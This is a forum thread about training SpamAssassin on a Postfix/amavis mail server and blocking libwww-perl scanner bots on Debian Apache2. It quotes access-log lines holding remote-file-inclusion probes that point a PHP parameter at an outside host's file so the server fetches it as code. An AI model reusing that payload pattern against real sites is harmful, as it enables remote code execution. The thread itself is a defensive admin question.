Training SA & libwww-perl bots

[trashed]

Hi.
I have installed a mailserver following falko's tutorial for postfix+mysql+quota+courier but now I wanted to train spamassassin to have less FP's on the type of spam I am usually target of. I have already more than 3000 messages that are 100% spam & phishing.
Anyway, I googled around a bit but all I found was ways to train the filter on a per-user basis while I wanted to do it system-wide (so that SA will use that filter for every mailbox). How can I accomplish that?
(note: I am running amavis-new + SA)

Another problem I am currently having is the endless attacks from libwww-perl bots that scan my php scripts for vulnerabilities:

Code:

63.243.44.3 - - [28/May/2008:08:11:12 +0200] "GET /index.php/2008/05/?pd=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 200 4140 "-" "libwww-perl/5.79"
196.40.2.126 - - [28/May/2008:08:11:12 +0200] "GET /index.php/2008/05/?pd=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 200 4140 "-" "libwww-perl/5.65"

I read something around on how to block this type of user-agent but apache2 on debian has a split configuration and I'm not really sure how to implement this. Should I use the rules in every virtualhost that I am using?
If so, can I have an example?

[falko]

Quote:

Originally Posted by trashed

Hi.
I have installed a mailserver following falko's tutorial for postfix+mysql+quota+courier but now I wanted to train spamassassin to have less FP's on the type of spam I am usually target of. I have already more than 3000 messages that are 100% spam & phishing.
Anyway, I googled around a bit but all I found was ways to train the filter on a per-user basis while I wanted to do it system-wide (so that SA will use that filter for every mailbox). How can I accomplish that?
(note: I am running amavis-new + SA)

You could put all spam in one mailbox and then use a command like this:

Code:

sa-learn --no-sync [--spam or --ham] --mbox [folder]

Quote:

Originally Posted by trashed

Another problem I am currently having is the endless attacks from libwww-perl bots that scan my php scripts for vulnerabilities:

Code:

63.243.44.3 - - [28/May/2008:08:11:12 +0200] "GET /index.php/2008/05/?pd=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 200 4140 "-" "libwww-perl/5.79"
196.40.2.126 - - [28/May/2008:08:11:12 +0200] "GET /index.php/2008/05/?pd=http://www.digitalcosta.com/includes/PEAR/safeon.gif??????? HTTP/1.1" 200 4140 "-" "libwww-perl/5.65"

I read something around on how to block this type of user-agent but apache2 on debian has a split configuration and I'm not really sure how to implement this. Should I use the rules in every virtualhost that I am using?
If so, can I have an example?

Take a look here: http://www.cyberciti.biz/tips/the-ri...bwww-perl.html